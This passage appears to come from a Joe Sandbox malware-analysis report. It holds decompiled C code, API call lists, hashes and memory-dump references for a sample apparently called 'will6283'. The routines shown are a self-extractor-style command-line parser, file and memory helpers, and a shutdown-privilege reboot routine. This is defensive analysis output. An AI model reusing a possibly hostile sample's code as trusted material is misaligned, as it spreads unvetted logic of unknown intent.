API String ID: 381621628-0
Opcode ID: a24cb0048dfbc5777c8b572bfb549b28badf6e4dc75408d1b94619cbbf21255f
Instruction ID: 1333910472508d3bfc25455f5b913ce02e48c2664cb09e0d02c44396ef937590
Opcode Fuzzy Hash: a24cb0048dfbc5777c8b572bfb549b28badf6e4dc75408d1b94619cbbf21255f
Instruction Fuzzy Hash: B3F08970704209BBE760EB749D05FFE77ACDB64700F40446AA9C6D7191DD7699448750

Uniqueness

Uniqueness Score: -1.00%

Function 01064B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01064B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x1068d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x1068d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x1068d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x1068d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x1068d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x1068d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x1068d6c)) = 0;
				return 0;
			}

0x01064b66
0x01064b74
0x01064b98
0x01064ba0
0x00000000
0x01064bac
0x01064ba4
0x00000000
0x01064ba4
0x01064b78
0x01064b7e
0x01064b84
0x01064b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,01064FA1,00000000), ref: 01064B98

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5eff183c086720139865cfce501f7c0914fdaa19c1a2e4d0c507f3ba366bc841
Instruction ID: 47258028646e064364bf3bf03ea4d219ba22d9952403b64ac6b2944a03d14750
Opcode Fuzzy Hash: 5eff183c086720139865cfce501f7c0914fdaa19c1a2e4d0c507f3ba366bc841
Instruction Fuzzy Hash: E8F01231540B09AE4771AE29CC0069ABBEAEAB52A0710992FD5EED2150E7316481CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010666AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010666AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x010666b1
0x010666ba
0x010666c7
0x010666bc
0x010666be
0x010666be

APIs

GetFileAttributesA.KERNELBASE(?,01064777,?,01064E38,?), ref: 010666B1

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3be26510a217130ce1d353e4bf05a6cc89721f3669caf979e9918ab97f1bdd1c
Instruction ID: cf63895b2caa7ff216f5dc335e6880d599bd56e32feb9cfb1d58433a0a985cb3
Opcode Fuzzy Hash: 3be26510a217130ce1d353e4bf05a6cc89721f3669caf979e9918ab97f1bdd1c
Instruction Fuzzy Hash: FFB0927A226440826A61163578295562885A7C123A7E41B90F072D11E4CA3FD856D104

Uniqueness

Uniqueness Score: -1.00%

Function 01064CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01064CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x01064caa
0x01064cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 01064CAA

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 7c1350df908e950946afa652af13f1942a38e67cb6121752f5d03f535b41e93b
Instruction ID: 54d143a08e587ec30fe70a814d63ce482c98d621aa7692141e3f020b0ec5b2c1
Opcode Fuzzy Hash: 7c1350df908e950946afa652af13f1942a38e67cb6121752f5d03f535b41e93b
Instruction Fuzzy Hash: 54B0123214820CF7DF102EC2E809F853F1DE7C4761F140000F60C460508A7794108795

Uniqueness

Uniqueness Score: -1.00%

Function 01064CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01064CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x01064cc8
0x01064ccf

APIs

GlobalFree.KERNELBASE ref: 01064CC8

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 5bffc1af65836a73e0c1ee352636ab75cc979840c4aaa0f2eaf3b36555924447
Instruction ID: 8e096ff2ff3bcb918937dff4184a8cbc335bb50aa93d077a8a05d6c0650b8ccb
Opcode Fuzzy Hash: 5bffc1af65836a73e0c1ee352636ab75cc979840c4aaa0f2eaf3b36555924447
Instruction Fuzzy Hash: 5CB0123100010CF78F102A42E8088453F1DD6C03607000010F50C420218B3B98118684

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01065C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01065C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x1068004; // 0x19e58fb5
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E01066CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E01066E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x1068004; // 0x19e58fb5
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0106597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E010644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x1069124 = E01066285();
									_t75 = 0;
								}
								return E01066CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E010644B9(0, 0x521, 0x1061140, 0, 0x40, 0);
												_t85 =  *0x1068588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0106667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0106667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E01065C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E01061680(0x1068c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0106667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0106667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x1068a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E01065C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x1068b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x1068a3a;
																}
																E01061680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0106658A(_t218, 0x104, 0x1061140);
																if(E010631E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x1068a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x1068a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x1068a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x1068a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x1068a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x1069a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x1069a2c =  *0x1069a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x1068d48 =  *0x1068d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x1069a2c =  *0x1069a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x1069a2c =  *0x1069a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x1068d48 =  *0x1068d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x1069a2c =  *0x1069a2c | 0x00000004;
																										L70:
																										 *0x1068a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x1069a2c = 3;
																	 *0x1068a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x1068a2c != 0 &&  *0x1068b3e == 0) {
						if(GetModuleFileNameA( *0x1069a3c, 0x1068b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010666C8(0x1068b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x01065c9e
0x01065ca9
0x01065cb0
0x01065cb3
0x01065cb6
0x01065cb7
0x01065cb8
0x01065cbd
0x01066204
0x01065ccb
0x00000000
0x01065ccb
0x01065cd3
0x01065cd7
0x01065cf4
0x00000000
0x01065cf4
0x01065cf8
0x01065d00
0x00000000
0x01065d06
0x01065d06
0x01065d0e
0x01065d10
0x01065d12
0x01065d14
0x01065d15
0x01065d17
0x01065d49
0x00000000
0x00000000
0x00000000
0x00000000
0x01065d19
0x01065d19
0x01065d1d
0x00000000
0x01065d3f
0x01065d3f
0x01065d4b
0x01065d4b
0x01065d4f
0x01065d8d
0x00000000
0x01065d93
0x01065d93
0x01065d9a
0x01065d9d
0x01065d9e
0x00000000
0x01065d9e
0x01065d51
0x01065d5b
0x01065d72
0x010660fb
0x010660fb
0x01066207
0x0106620a
0x0106620b
0x0106620e
0x01066217
0x01065d78
0x01065d78
0x01065d80
0x01065d83
0x01065d84
0x00000000
0x01065d84
0x01065d5d
0x01065d5f
0x01065d62
0x01065d68
0x01065d64
0x01065d64
0x01065d64
0x00000000
0x01065d62
0x01065d5b
0x01065d4f
0x01065d1d
0x00000000
0x01065d9f
0x01065d9f
0x01065da5
0x01065dab
0x01065dba
0x01066218
0x0106621d
0x01066220
0x01066221
0x01066229
0x01066230
0x01066247
0x0106626a
0x01066272
0x01066249
0x01066255
0x0106625f
0x01066264
0x01066264
0x01066284
0x01065dc0
0x01065dc0
0x01065dca
0x01065e22
0x00000000
0x00000000
0x00000000
0x00000000
0x01065dcc
0x01065dce
0x01065e24
0x01065e24
0x01065e2c
0x01065e47
0x01065e4a
0x010661d2
0x010661e2
0x010661e7
0x010661ee
0x010661f1
0x010661f1
0x010661f8
0x010661f8
0x01065e50
0x01065e53
0x01066109
0x0106611f
0x00000000
0x01066125
0x01066137
0x0106613a
0x0106613c
0x0106613e
0x0106613e
0x01066141
0x01066141
0x01066143
0x01066144
0x0106614a
0x00000000
0x01066150
0x01066152
0x0106615c
0x01066170
0x01066172
0x0106617c
0x01066190
0x01066190
0x01066196
0x010661a5
0x00000000
0x010661ab
0x010661b9
0x010661c6
0x010661c6
0x0106617e
0x01066180
0x0106618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0106618a
0x0106615e
0x01066160
0x0106616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0106616a
0x0106615c
0x0106614a
0x0106610b
0x0106610e
0x0106610e
0x00000000
0x01065e59
0x01065e59
0x01065e5c
0x0106604f
0x01066056
0x00000000
0x0106605c
0x0106606e
0x01066071
0x01066073
0x01066075
0x01066075
0x01066078
0x01066078
0x0106607a
0x0106607b
0x01066081
0x00000000
0x01066087
0x01066087
0x0106608d
0x0106609c
0x00000000
0x010660a2
0x010660aa
0x010660b2
0x010660b7
0x010660bd
0x010660bf
0x010660bf
0x010660d6
0x010660e0
0x010660e7
0x010660f5
0x00000000
0x00000000
0x00000000
0x00000000
0x010660f5
0x0106609c
0x01066081
0x01065e62
0x01065e62
0x01065e65
0x01065fd3
0x01065fe9
0x00000000
0x01065fef
0x01065fef
0x01065ff7
0x01065ffd
0x01066003
0x01066006
0x01066011
0x01066014
0x0106603d
0x01066016
0x01066018
0x01066019
0x0106601b
0x01066033
0x0106601d
0x01066020
0x01066029
0x01066022
0x01066022
0x01066022
0x01066020
0x0106601b
0x01066042
0x01066044
0x01066046
0x0106604a
0x01065ff7
0x01065fd5
0x01065fd8
0x01065fd8
0x00000000
0x01065e6b
0x01065e6b
0x01065e6e
0x01065f8b
0x01065f99
0x00000000
0x01065f9f
0x01065fa7
0x01065faf
0x00000000
0x01065fb1
0x01065fb3
0x00000000
0x01065fb5
0x01065fb7
0x00000000
0x01065fb9
0x00000000
0x01065fb9
0x01065fb7
0x01065fb3
0x01065faf
0x01065f8d
0x01065f8d
0x01065f8d
0x01065f8f
0x01065fc1
0x01065fc1
0x01065fc1
0x00000000
0x01065e74
0x01065e74
0x01065e77
0x01065ea0
0x01065ebd
0x01065f79
0x00000000
0x01065f7f
0x01065ec3
0x01065ec3
0x01065ecc
0x01065ed4
0x01065ed6
0x01065edc
0x01065edf
0x01065eea
0x01065eed
0x01065f3f
0x01065f40
0x00000000
0x01065eef
0x01065eef
0x01065ef2
0x01065f34
0x01065ef4
0x01065ef4
0x01065ef7
0x01065f2b
0x00000000
0x01065ef9
0x01065ef9
0x01065efc
0x01065f22
0x00000000
0x01065efe
0x01065eff
0x01065f02
0x01065f16
0x01065f04
0x01065f07
0x01065f0d
0x01065f46
0x01065f46
0x01065f09
0x01065f09
0x01065f09
0x01065f07
0x01065f02
0x01065efc
0x01065ef7
0x01065ef2
0x01065f4c
0x01065f4e
0x01065f50
0x01065f54
0x01065ed4
0x01065ea2
0x01065ea4
0x01065eaf
0x01065eaf
0x00000000
0x01065e79
0x01065e7d
0x00000000
0x01065e83
0x01065e83
0x01065e83
0x01065e85
0x01065e85
0x01065e8e
0x00000000
0x01065e94
0x00000000
0x01065e94
0x01065e8e
0x01065e7d
0x01065e77
0x01065e6e
0x01065e65
0x01065e5c
0x00000000
0x00000000
0x00000000
0x01065dd0
0x01065dd0
0x01065dd0
0x00000000
0x01065dd0
0x01065dce
0x01065dca
0x01065dba
0x00000000
0x01065d00
0x01065dd9
0x01065e04
0x010661fe
0x01065e0a
0x01065e0c
0x01065e17
0x01065e17
0x01065e04
0x01066200
0x01066200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 01065CEE
GetModuleFileNameA.KERNEL32(01068B3E,00000104,00000000,?,?), ref: 01065DFC
CharUpperA.USER32(?), ref: 01065E3E
CharUpperA.USER32(-00000052), ref: 01065EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01065F6F
CharUpperA.USER32(?), ref: 01065FA7
CharUpperA.USER32(-0000004E), ref: 01066008
CharUpperA.USER32(?), ref: 010660AA
CloseHandle.KERNEL32(00000000,01061140,00000000,00000040,00000000), ref: 010661F1
ExitProcess.KERNEL32 ref: 010661F8

Strings

:, xrefs: 01066118
", xrefs: 0106612D
RegServer, xrefs: 01065F66
", xrefs: 01065D78

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: a60659ee017b725ef8df305db30a3950816b0611e6ea704523cc57ae349e4b31
Instruction ID: e4424071145027ce038ab8984598dd909fcab328d91f90919ec6bff090c30e84
Opcode Fuzzy Hash: a60659ee017b725ef8df305db30a3950816b0611e6ea704523cc57ae349e4b31
Instruction Fuzzy Hash: 47D16B71A042459FFF759B3C8C483FE3FEDAB16384F0881EAD5C6D6195D6768A828B40

Uniqueness

Uniqueness Score: -1.00%

Function 01061F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E01061F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x1069a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x1068004; // 0x19e58fb5
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E010644B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E01066CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E010644B9(0, 0x522, 0x1061140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E01061EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x01061f90
0x01061f90
0x01061f93
0x01061f98
0x01061fa4
0x01061fa7
0x01061fc5
0x01061fcd
0x01061fdb
0x01061ee5
0x01061eea
0x01061ef1
0x01061ef4
0x01061f0c
0x01061f2e
0x01061f3a
0x01061f46
0x01061f4d
0x01061f58
0x01061f60
0x01061f61
0x01061f62
0x01061f75
0x01061f80
0x01061f77
0x01061f77
0x00000000
0x01061f77
0x01061f64
0x01061f64
0x00000000
0x01061f64
0x01061f0e
0x01061f0e
0x01061f13
0x01061f13
0x01061f14
0x01061f14
0x01061f16
0x01061f17
0x01061f1a
0x01061f1f
0x01061f1f
0x01061f86
0x01061f8f
0x01061fcf
0x01061fd3
0x00000000
0x01061fd3
0x01061fa9
0x01061fb4
0x01061fbb
0x01061fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x01061fc3
0x01061f9a
0x01061f9a
0x01061fa2
0x01061fd9
0x01061fda
0x00000000
0x00000000
0x00000000
0x01061fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01061EFB
OpenProcessToken.ADVAPI32(00000000), ref: 01061F02
ExitWindowsEx.USER32(00000002,00000000), ref: 01061FD3

Strings

SeShutdownPrivilege, xrefs: 01061F28

Memory Dump Source

Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true

Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1060000_will6283.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: a5510c97740e25a64e7bed892edab2357f3641815d6886c7843f7d865b79f6fc
Instruction ID: 120f43f73af9a25c982257584600e56a4d03c97857b0296cd701e13d586d0a4a
Opcode Fuzzy Hash: a5510c97740e25a64e7bed892edab2357f3641815d6886c7843f7d865b79f6fc
Instruction Fuzzy Hash: DA21E571B40205FBEB30ABA59C4AFBF76FCEBD5B50F100019FA82E6185DB7A84018361

Uniqueness

Uniqueness Score: -1.00%

Function 01066CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01066CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
